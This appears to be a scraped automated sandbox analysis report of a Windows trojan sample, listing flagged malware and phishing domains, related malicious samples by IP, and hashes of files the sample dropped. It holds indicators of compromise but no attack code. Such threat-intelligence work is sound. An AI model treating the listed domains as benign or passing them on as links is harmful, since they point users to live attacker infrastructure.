                                                                                                                                                                                                            http://lysysir.com/login.phpsvchost.exe, 00000002.00000003.1933269002.0000000002F32000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1936983553.0000000002F32000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1936268348.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://gatyruw.com/Hsvchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://lymyjon.com/login.phpsvchost.exe, 00000002.00000003.1838938821.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1838350942.0000000002F25000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1835708168.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://volykit.com/login.phpsvchost.exe, 00000002.00000003.1870864138.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1874490418.0000000002F33000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1872098357.0000000002F60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1870410496.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1874254950.0000000002F28000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1871321713.0000000002FE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: phishing
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://lyryjej.com/login.phpsvchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            unknown
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1553825
Start date and time: 2024-11-11 18:23:30 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 21s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 28
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 13
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Sample name: Z8eHwAvqAh.exe (renamed because original name is a hash value)
Original Sample Name: 281bff88b708e81638f6c4548d0bac897a059c54.exe
Detection: MAL
Classification: mal100.bank.troj.spyw.expl.evad.winEXE@7/33@1112/23
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 98%
• Number of executed functions: 36
• Number of non-executed functions: 281
Cookbook Comments:
• Found application associated with file extension: .exe
• Connection to analysis system has been lost, crash info: Unknown
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, SIHClient.exe, Sgrmuserer.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                            • Excluded IPs from analysis (whitelisted): 2.23.209.182, 2.23.209.187, 2.23.209.183, 2.23.209.149, 2.23.209.185, 2.23.209.135, 2.23.209.133, 2.23.209.144, 2.23.209.141, 40.126.31.69, 20.190.159.68, 20.190.159.23, 40.126.31.67, 20.190.159.71, 20.190.159.0, 20.190.159.4, 20.190.159.73, 20.189.173.21, 2.23.209.148, 2.23.209.130, 2.23.209.150, 2.23.209.176, 2.23.209.140, 2.23.209.189, 2.23.209.158, 2.23.209.179
                                                                                                                                                                                                            • Excluded domains from analysis (whitelisted): www.bing.com, prdv4a.aadg.msidentity.com, otelrules.azureedge.net, slscr.update.microsoft.com, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, www-www.bing.com.trafficmanager.net, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, e86303.dscx.akamaiedge.net, www.bing.com.edgekey.net, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, umwatson.events.data.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
• Not all processes were analyzed; the report is missing behavior information
                                                                                                                                                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                            • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                            • VT rate limit hit for: Z8eHwAvqAh.exe
Time      Type             Description
12:25:01  API Interceptor  898x Sleep call for process: svchost.exe modified
12:25:49  API Interceptor  2x Sleep call for process: WerFault.exe modified
                                                                                                                                                                                                            • 44.221.84.105
                                                                                                                                                                                                            uavINoSIQh.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 44.221.84.105
                                                                                                                                                                                                            7DAKMhINGk.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 44.221.84.105
                                                                                                                                                                                                            sora.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                            • 44.210.24.233
                                                                                                                                                                                                            Attachment-914011545-004.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 54.144.73.197
                                                                                                                                                                                                            http://swctch.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 52.2.182.50
                                                                                                                                                                                                            Payslip Notification #5800210900 11112024.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 23.22.254.206
                                                                                                                                                                                                            90876654545.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                                                                                            • 3.5.11.187
                                                                                                                                                                                                            GE AEROSPACE _WIRE REMITTANCE.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 54.167.120.151
                                                                                                                                                                                                            Sampension-file-846845087.pdfGet hashmaliciousCaptcha PhishBrowse
                                                                                                                                                                                                            • 52.21.71.129
                                                                                                                                                                                                            CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdWlCVLbzNph.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 106.15.232.163
                                                                                                                                                                                                            Bpfz752pYZ.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 106.15.232.163
                                                                                                                                                                                                            uavINoSIQh.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 106.15.232.163
                                                                                                                                                                                                            7DAKMhINGk.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 106.15.232.163
                                                                                                                                                                                                            sora.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                            • 120.79.48.98
                                                                                                                                                                                                            sora.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                            • 8.188.166.167
                                                                                                                                                                                                            mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 47.93.221.102
                                                                                                                                                                                                            C6y77dS3l7.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 118.31.219.198
                                                                                                                                                                                                            Wiu8X6685m.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 118.31.219.198
                                                                                                                                                                                                            WUa1Tm8Dlv.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 118.31.219.198
                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                            37f463bf4616ecd445d4a1937da06e19WlCVLbzNph.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 188.114.97.3
                                                                                                                                                                                                            • 99.83.170.3
                                                                                                                                                                                                            • 188.114.96.3
                                                                                                                                                                                                            Bpfz752pYZ.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 188.114.97.3
                                                                                                                                                                                                            • 99.83.170.3
                                                                                                                                                                                                            • 188.114.96.3
                                                                                                                                                                                                            uavINoSIQh.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 188.114.97.3
                                                                                                                                                                                                            • 99.83.170.3
                                                                                                                                                                                                            • 188.114.96.3
                                                                                                                                                                                                            7DAKMhINGk.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 188.114.97.3
                                                                                                                                                                                                            • 99.83.170.3
                                                                                                                                                                                                            • 188.114.96.3
                                                                                                                                                                                                            11315781264#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                            • 188.114.97.3
                                                                                                                                                                                                            • 99.83.170.3
                                                                                                                                                                                                            • 188.114.96.3
                                                                                                                                                                                                            P52mX04112024145925383.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                            • 188.114.97.3
                                                                                                                                                                                                            • 99.83.170.3
                                                                                                                                                                                                            • 188.114.96.3
                                                                                                                                                                                                            Factura Honorarios 2024-11-04.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                                            • 188.114.97.3
                                                                                                                                                                                                            • 99.83.170.3
                                                                                                                                                                                                            • 188.114.96.3
                                                                                                                                                                                                            CERTIFICADO TITULARIDAD.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                                            • 188.114.97.3
                                                                                                                                                                                                            • 99.83.170.3
                                                                                                                                                                                                            • 188.114.96.3
                                                                                                                                                                                                            Anfrage.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                            • 188.114.97.3
                                                                                                                                                                                                            • 99.83.170.3
                                                                                                                                                                                                            • 188.114.96.3
                                                                                                                                                                                                            Quotation.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                                                                                            • 188.114.97.3
                                                                                                                                                                                                            • 99.83.170.3
                                                                                                                                                                                                            • 188.114.96.3
No context

Process: C:\Windows\apppatch\svchost.exe
File Type: data
Category: dropped
Size (bytes): 593
Entropy (8bit): 7.626935561277827
Encrypted: false
SSDEEP: 12:NXnYWSLEmM3e7/EzZUimtdHCD6B+HAwQ0m7xs01O58/fTU6i0rSZd09LQ:FYWSLdM3CENUJtd85IsWO58NGd09k
MD5: 926512864979BC27CF187F1DE3F57AFF
SHA1: ACDEB9D6187932613C7FA08EAF28F0CD8116F4B5
SHA-256: B3E893A653EC06C05EE90F2F6E98CC052A92F6616D7CCA8C416420E178DCC73F
SHA-512: F6F9FD3CA9305BEC879CFCD38E64111A18E65E30D25C49E9F2CD546CBAB9B2DCD03ECA81952F6B77C0EAAB20192EF7BEF0D8D434F6F371811929E75F8620633B
Malicious: false

Process: C:\Windows\apppatch\svchost.exe
File Type: data
Category: dropped
Size (bytes): 43073
Entropy (8bit): 7.989681857548974
Encrypted: false
SSDEEP: 768:A6eLDU7W3WFK7OWC7qILQs3VmXYouwq3WWYCqNDk9C47h3hOJCcwCw48Ii5:AD33bKWC7n73YxCY/Nw9thOkcwKVk
MD5: AC06107DAB7307631EF7E3EE3CE4944E
SHA1: E5EA13F735A29646DD18C62C700093F214F2AD3C
SHA-256: 2B50A2A53C50CA769D904F683A576D04BD1AE5275456E1D352180D43616D6E5B
SHA-512: 4EAF11F3351482AF07862D7BF20B1ED3B556F9D5590404720B9DDBBD5D8AFAB30C9E15D1C62F2171E14200ED58FD0B54C1351820F35740D5BB867F2674B4A6C2
Malicious: false

Process: C:\Windows\apppatch\svchost.exe
File Type: data
Category: dropped
Size (bytes): 1230
Entropy (8bit): 7.8443466513066555
Encrypted: false
SSDEEP: 24:IZsdS4WuknSxezuQj1kZ8l9KfPqiH/+/spck4qtr/gr3Nccm1FAU2nA1:QsSuknSxez1Rg8ylAsSk4OrgWetA1
MD5: 7D8CFB9346A47669DCDCE080632DE2A6
SHA1: 3FB989F2F7D84DC1204F4DA07398163D788744B2
SHA-256: 9F2316A8A4FE0EC65F36295CDFF753E454726C7B7D5A1B05ECA797835A39AC84
SHA-512: B522C8D54896AE1E4B9A35CAAB20A3B8125FECB21F1EDA9BC5E48E1F7BB3EE9E6AB74330CC20690340A0C95FFDC81FFA2C1BCB3ADFABA32E6FFF1AD1C98A7449
Malicious: false
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):114
                                                                                                                                                                                                            Entropy (8bit):6.479691220248167
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:elfPZkATGqaNh/bf4/o/flD2qNJ5ZmANv:elfhkVNh/L4kl2qNJ5ZmAx
                                                                                                                                                                                                            MD5:BFDE1E9E9C32C1681A16139450C6909D
                                                                                                                                                                                                            SHA1:7E669B927E6A75A10A0CA29E38E58DDCB49B725E
                                                                                                                                                                                                            SHA-256:E0D020BA1CB6506CEE234903A44C747EE0CFA7E2D1E60029E4CD8DE9A431512A
                                                                                                                                                                                                            SHA-512:781FD54F155442DD34F9919B3CD063EE399DB411BBFE15F2BDC43D3AB8AC2D04E1011B2C99FAB42BEBF7B903A94E09AAAEF71B7A465D2D04B417F6DAD8E8E396
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):59521
                                                                                                                                                                                                            Entropy (8bit):7.972507988182049
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:ZQimNJq4lkHqWmHwEyivDfOoG5tN06d+1e:ZRukFmHy4rG5tUe
                                                                                                                                                                                                            MD5:FB1B1466D0D4BB0077A37E03C08361C5
                                                                                                                                                                                                            SHA1:5E6AB8E30AA579CB8FB974BFA39E954910F95FF6
                                                                                                                                                                                                            SHA-256:82B4AD767B0227FF25BA3B959FB210927954F2C0290ABBF7A9D8E8391763653B
                                                                                                                                                                                                            SHA-512:BB0250201472065FA426AC5AA58C23DD832F4B7B621FCCF4B7B1FA54E0F239241EFEC32D16A3A478D25CBBFDB683360C53D6AE9290A23D3D8E25EE460517F9E4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):593
                                                                                                                                                                                                            Entropy (8bit):7.626935561277827
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:NXnYWSLEmM3e7/EzZUimtdHCD6B+HAwQ0m7xs01O58/fTU6i0rSZd09LQ:FYWSLdM3CENUJtd85IsWO58NGd09k
                                                                                                                                                                                                            MD5:926512864979BC27CF187F1DE3F57AFF
                                                                                                                                                                                                            SHA1:ACDEB9D6187932613C7FA08EAF28F0CD8116F4B5
                                                                                                                                                                                                            SHA-256:B3E893A653EC06C05EE90F2F6E98CC052A92F6616D7CCA8C416420E178DCC73F
                                                                                                                                                                                                            SHA-512:F6F9FD3CA9305BEC879CFCD38E64111A18E65E30D25C49E9F2CD546CBAB9B2DCD03ECA81952F6B77C0EAAB20192EF7BEF0D8D434F6F371811929E75F8620633B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):114
                                                                                                                                                                                                            Entropy (8bit):6.479691220248167
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:elfPZkATGqaNh/bf4/o/flD2qNJ5ZmANv:elfhkVNh/L4kl2qNJ5ZmAx
                                                                                                                                                                                                            MD5:BFDE1E9E9C32C1681A16139450C6909D
                                                                                                                                                                                                            SHA1:7E669B927E6A75A10A0CA29E38E58DDCB49B725E
                                                                                                                                                                                                            SHA-256:E0D020BA1CB6506CEE234903A44C747EE0CFA7E2D1E60029E4CD8DE9A431512A
                                                                                                                                                                                                            SHA-512:781FD54F155442DD34F9919B3CD063EE399DB411BBFE15F2BDC43D3AB8AC2D04E1011B2C99FAB42BEBF7B903A94E09AAAEF71B7A465D2D04B417F6DAD8E8E396
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):25028
                                                                                                                                                                                                            Entropy (8bit):7.9797082546003875
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:n4ak8nl3r9Htb3NJNRG6qJRjjWk5rSV4Z8tPzh3XCV5:4JElb9HN1RG6qJ5jWKW4S8P
                                                                                                                                                                                                            MD5:8390FB2A03D3FF9736AB403A143E16DD
                                                                                                                                                                                                            SHA1:18A6DABD29D92F7478BBE72D1CF446CEEE7FA7CD
                                                                                                                                                                                                            SHA-256:E84AE063EC89EFF8520531B29B22D0A1C0E43E188233A798E0E44FEA5B918D97
                                                                                                                                                                                                            SHA-512:3AB54AE311C241F7064E93CD679BDC594FBF3C6D5BB246B3133467ABD6197CB00039F1A4C9D0D4DF6F3B661C2B6DBD46F46149D5CF11AE5B012823180F283533
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1094
                                                                                                                                                                                                            Entropy (8bit):7.837350259278631
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:IZsdS4WMBLdxezuQj1kZ8l9KfPqiHKuCkTXRUubFU:QsSixez1Rg8yakTXRdFU
                                                                                                                                                                                                            MD5:F8EC1411CF7080A2B973060C296B1E8E
                                                                                                                                                                                                            SHA1:2177E0841581A404FBB90A47BA014EC1D7C1E88D
                                                                                                                                                                                                            SHA-256:5B6EC1599F5F6BF1E3A7A8B1F9C6141E71BF307A95AE20C7300D776769AF6432
                                                                                                                                                                                                            SHA-512:3F0EE5605AC2E51DAB6B6F23D959E28089D523FD8F9D049546DC72E432426D9CD966AA17E2CC69CDC9CAB3C61621683DD18238718C35346DE9E96A8C6A2A75A8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):65536
                                                                                                                                                                                                            Entropy (8bit):0.9501653270082964
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:W0F6WeVWzsSChJoI7JfpQXIDcQvc6QcEVcw3cE/3+HbHgnoW6He1Oy1QaSWAEN9F:/fe8z90BU/QjRJkVzuiFnZ24IO8AU
                                                                                                                                                                                                            MD5:C709AFAE1BFABE6F101A32CC1DEC903E
                                                                                                                                                                                                            SHA1:4092BD8B19260C85C6FD1A8E3A5DB1D72E991A53
                                                                                                                                                                                                            SHA-256:175180C51F64D2B7E730AFEB8C1B51CBAC9A9210DDF3314A0613CCD052A5D0A6
                                                                                                                                                                                                            SHA-512:E6151D1253F0AC13BAA25DBFECB31D53F2CD3CDF7BBA5BF4B69CA4BDE32CE551AE27FDFE5A7C94AB5391974B4773495FE9478BCB2080A02A97DC0EE199561537
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.8.1.9.5.4.3.6.5.1.6.1.3.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.8.1.9.5.4.4.2.1.4.1.2.4.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.5.4.6.6.d.3.7.-.5.c.f.e.-.4.e.b.5.-.8.b.2.a.-.3.0.9.3.8.c.9.f.c.a.1.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.a.d.e.7.1.c.d.-.8.1.7.6.-.4.4.2.9.-.b.3.1.a.-.5.e.3.f.9.e.e.e.3.0.c.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.s.w.v.G.C.A.x.O.M.i.k.Y.Q.e.o.Q.z.i.m.i.p.r.V.u...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.3.0.-.0.0.0.1.-.0.0.1.3.-.4.6.b.c.-.b.2.8.9.5.e.3.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.e.9.7.d.3.b.c.8.9.3.4.0.0.2.b.d.0.0.8.a.2.e.a.3.d.c.4.e.3.3.1.0.0.0.0.f.f.f.f.!.0.0.0.0.5.5.3.6.b.7.5.3.2.4.0.0.b.a.f.2.7.b.e.b.2.b.f.d.4.2.5.1.5.9.2.6.4.a.d.7.1.1.3.6.!.s.w.v.G.C.A.x.O.M.i.k.
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):65536
                                                                                                                                                                                                            Entropy (8bit):0.9574698494890729
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:RlFyFTceVWcksSChJoI7JfpQXIDcQvc6QcEVcw3cE/3+HbHgnoW6He1Oy1QaSWAu:zUee8ck90BU/QjRJk1zuiFMZ24IO8AU
                                                                                                                                                                                                            MD5:69F432300697A8FD7529941D0B9555FF
                                                                                                                                                                                                            SHA1:BAB832D5989D4AED8BD8C88F9B2FE8196CAE293A
                                                                                                                                                                                                            SHA-256:64C8EF7EE9976ED932C48CEE6ACE9FB4565B35DC97C2AF01F710D6566D07CA77
                                                                                                                                                                                                            SHA-512:52F731738566DABEC35249CE28A8E1D14BFB2EE1F1B898BD5C790B02FE5A3D6F087FE87E5550FCFFA1D11AAC478012800F488B6E3C95238C7DC7AE40B12E0EDE
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.8.1.9.5.4.1.4.0.3.4.8.2.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.8.1.9.5.4.2.9.6.5.9.7.7.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.f.c.4.0.b.c.c.-.0.c.1.4.-.4.0.e.2.-.b.d.0.1.-.b.d.7.6.e.5.d.f.a.f.2.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.2.e.0.0.7.1.a.-.e.b.a.8.-.4.a.9.7.-.8.5.c.d.-.2.f.5.2.8.8.a.2.a.b.e.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.s.w.v.G.C.A.x.O.M.i.k.Y.Q.e.o.Q.z.i.m.i.p.r.V.u...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.7.8.-.0.0.0.1.-.0.0.1.3.-.2.2.b.d.-.b.9.8.9.5.e.3.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.e.9.7.d.3.b.c.8.9.3.4.0.0.2.b.d.0.0.8.a.2.e.a.3.d.c.4.e.3.3.1.0.0.0.0.f.f.f.f.!.0.0.0.0.5.5.3.6.b.7.5.3.2.4.0.0.b.a.f.2.7.b.e.b.2.b.f.d.4.2.5.1.5.9.2.6.4.a.d.7.1.1.3.6.!.s.w.v.G.C.A.x.O.M.i.k.
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:Mini DuMP crash report, 14 streams, Mon Nov 11 17:25:42 2024, 0x1205a4 type
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):98662
                                                                                                                                                                                                            Entropy (8bit):1.9289114140886308
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:YxT1ndr30Gzf48TBzHgYcJnwc8QajTYJ3uYEjbWCKSlAc:Q1ndlzxzfKwc8QajTFYQbfmc
                                                                                                                                                                                                            MD5:6248162409DA39E6202B53948EF5AE19
                                                                                                                                                                                                            SHA1:9D1E0E5DE483BC6AF749C9012819ACC78AC819A0
                                                                                                                                                                                                            SHA-256:439A4704A00DD3CA9FDEBE2057466185C1C216BAA897D09EAC37B4900860D2E1
                                                                                                                                                                                                            SHA-512:1208AF6F18474B3EDFF0B04E1169ED1E172711FA67D5B98C7588B265E521F6A20C2C2A8A49ABDC99C2A9BB192C2C4CB2BD3664E0D8339E784427050F88E4B5E4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:Mini DuMP crash report, 14 streams, Mon Nov 11 17:25:42 2024, 0x1205a4 type
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):106730
                                                                                                                                                                                                            Entropy (8bit):1.9330978280707087
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:J7gwUwWlHKbgFznKzHwOmgMnjMOI/aTr4S+8km0aeC8BOqrvsjP:uw4lHKSznKzIgDYdV8BOy
                                                                                                                                                                                                            MD5:0FB639E51B3A603F5FA6BAC3C35B9C1B
                                                                                                                                                                                                            SHA1:3BA344BA053B0D8A2601E26192862B33DB16485D
                                                                                                                                                                                                            SHA-256:49EAE4A1FEE131A3D209B4E80F1714226F0E5046C38AB7E5B93CD5CBBE667EE1
                                                                                                                                                                                                            SHA-512:70A9595CBA92F8C58518E084834F5C0C6343D811C633CB3198622F42CB744FC0078EE15FE0E0CB2580A43255E4F3AECE75C158E830C4C4EC5CABDC7A4F6892F4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8410
                                                                                                                                                                                                            Entropy (8bit):3.711163533119206
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:R6l7wVeJB36P6YWoSURgmfv/prz89b5Zsf0K2Tm:R6lXJh6P6YpSURgmfv25yfj
                                                                                                                                                                                                            MD5:F14B1F83B8FD15ADD7AFD2025A75BD63
                                                                                                                                                                                                            SHA1:A1749669F20820AF040F31F474E1D737D91D0EB9
                                                                                                                                                                                                            SHA-256:054AF25F642D5576F71F92D330262BD22DC458BD07CF18F07DC1A9E5EAA4FFDD
                                                                                                                                                                                                            SHA-512:DC6CE3BE7BBDA66466D18D5E174F3AF5052BE259FF2BB564244E4411FBBE929A4AAF4686F51A8F39A226A724194F7E9454176DB5B842ECF08D17CD3577172F04
                                                                                                                                                                                                            Malicious:false
